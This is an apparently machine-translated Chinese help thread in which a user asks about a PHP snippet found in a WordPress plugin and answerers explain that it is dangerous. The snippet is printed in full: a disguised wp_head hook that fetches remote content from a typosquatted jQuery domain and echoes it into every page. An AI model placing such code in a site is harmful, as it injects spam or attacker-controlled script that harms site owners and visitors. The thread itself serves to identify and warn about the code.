我在插件中找到了这个。它有什么作用？危险吗？

我在插件中找到了这个。它有什么作用？危险吗？

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

它从一个域的错误拼写错误的域中加载了一个包含垃圾邮件的标记块（我曾考虑过发布一些源，但我不想以任何方式发布内容）http://jquery.com/–由jQuery使用，一个著名的流行Javascript库，而WordPress包含在Core中。我认为这个想法似乎是在加载该库，而实际上是在加载一些非常不同的东西。

它以其他方式试图显示正在加载jQuery。注意变量名$jquery。

它还可能尝试加载恶意脚本。我没有检查。我将肯定把它叫做危险特别是因为该网页上的内容可以随时更改域控制器觉得喜欢它。

充其量，这将损害您的网站，因为搜索引擎看不起散布垃圾邮件的网站。

不要使用它。它对您或对网站运营人员以外的其他任何人都无益。如果您在信誉良好的网站上发现了此问题，请向他们报告。

是的，这是危险代码，会从垃圾邮件站点加载内容。

您没有给插件命名，但是如果您在网站上安装了此代码后发现该代码，则该插件代码可能不是来自这样的开发人员，而是在安装后被黑了。在这种情况下，您可能会在网站上发现的恶意代码不只是此插件。

从最初从哪里获得插件的地方检查下载的插件代码，然后查看最初是否存在该恶意代码。如果不是，则您的网站已被黑客入侵。如果您确定是这种情况，请阅读食典中的这篇文章。